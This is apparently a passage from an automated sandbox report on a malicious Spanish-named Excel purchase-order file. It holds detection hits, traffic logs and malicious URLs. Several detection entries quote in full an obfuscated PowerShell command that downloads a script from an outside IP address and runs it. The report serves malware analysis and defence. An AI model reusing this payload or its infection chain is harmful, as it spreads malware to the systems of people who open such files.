yAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3716, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" , ProcessId: 4044, ProcessName: wscript.exe
        Sigma detected: Dynamic CSharp Compile Artefact
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3716, TargetFilename: C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline
        Sigma detected: Modification of IE Registry Settings
        Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3312, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))", CommandLine: poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgI
        Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3716, TargetFilename: C:\Users\user\AppData\Local\Temp\csdhpuz4.egi.ps1

        Data Obfuscation

        barindex
        Sigma detected: Dot net compiler compiles file from suspicious location
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3716, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline", ProcessId: 3920, ProcessName: csc.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-10T06:57:45.530721+010020241971A Network Trojan was detected172.245.142.6080192.168.2.2249164TCP
        2024-12-10T06:57:50.179073+010020241971A Network Trojan was detected172.245.142.6080192.168.2.2249166TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-10T06:57:45.530608+010020244491Attempted User Privilege Gain192.168.2.2249164172.245.142.6080TCP
        2024-12-10T06:57:50.178973+010020244491Attempted User Privilege Gain192.168.2.2249166172.245.142.6080TCP
        2024-12-10T06:58:13.226642+010020244491Attempted User Privilege Gain192.168.2.2249173172.245.142.6080TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-10T06:58:33.137505+010020490381A Network Trojan was detected151.101.1.137443192.168.2.2249174TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-10T06:57:58.219043+010028587951A Network Trojan was detected192.168.2.2249167172.245.142.6080TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for URL or domain
        Source: https://short.ruksk.com/BKAvira URL Cloud: Label: malware
        Source: https://short.ruksk.com/derAvira URL Cloud: Label: malware
        Source: https://short.ruksk.com/IAvira URL Cloud: Label: malware
        Source: https://short.ruksk.com/ILEAvira URL Cloud: Label: malware
        Source: https://short.ruksk.com/Avira URL Cloud: Label: malware
        Source: https://short.ruksk.com/zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&geAvira URL Cloud: Label: malware
        Source: https://short.ruksk.com/zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshiftAvira URL Cloud: Label: malware
        Source: https://short.ruksk.com/3vAvira URL Cloud: Label: malware
        Multi AV Scanner detection for submitted file
        Source: Orden_de_Compra_Nmero_6782929219.xlsReversingLabs: Detection: 13%
        Source: Orden_de_Compra_Nmero_6782929219.xlsVirustotal: Detection: 14%Perma Link
        Machine Learning detection for sample
        Source: Orden_de_Compra_Nmero_6782929219.xlsJoe Sandbox ML: detected

        Phishing

        barindex
        Yara detected HtmlPhish44
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive[1].hta, type: DROPPED
        Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.22:49174 version: TLS 1.0
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49163 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49165 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49171 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49172 version: TLS 1.2
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.pdb source: powershell.exe, 00000007.00000002.444981624.00000000029D6000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.pdb source: powershell.exe, 00000014.00000002.496191846.0000000002523000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.pdbhP source: powershell.exe, 00000014.00000002.496191846.0000000002523000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.pdbhP source: powershell.exe, 00000007.00000002.444981624.00000000030D9000.00000004.00000800.00020000.00000000.sdmp

        Software Vulnerabilities

        barindex
        Document exploit detected (process start blacklist hit)
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
        Suspicious execution chain found
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: global trafficDNS query: name: short.ruksk.com
        Source: global trafficDNS query: name: short.ruksk.com
        Source: global trafficDNS query: name: short.ruksk.com
        Source: global trafficDNS query: name: short.ruksk.com
        Source: global trafficDNS query: name: short.ruksk.com
        Source: global trafficDNS query: name: res.cloudinary.com
        Source: global trafficDNS query: name: res.cloudinary.com
        Source: global trafficDNS query: name: short.ruksk.com
        Source: global trafficDNS query: name: short.ruksk.com
        Source: global trafficDNS query: name: short.ruksk.com
        Source: global trafficDNS query: name: short.ruksk.com
        Source: global trafficDNS query: name: res.cloudinary.com
        Source: global trafficDNS query: name: res.cloudinary.com
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
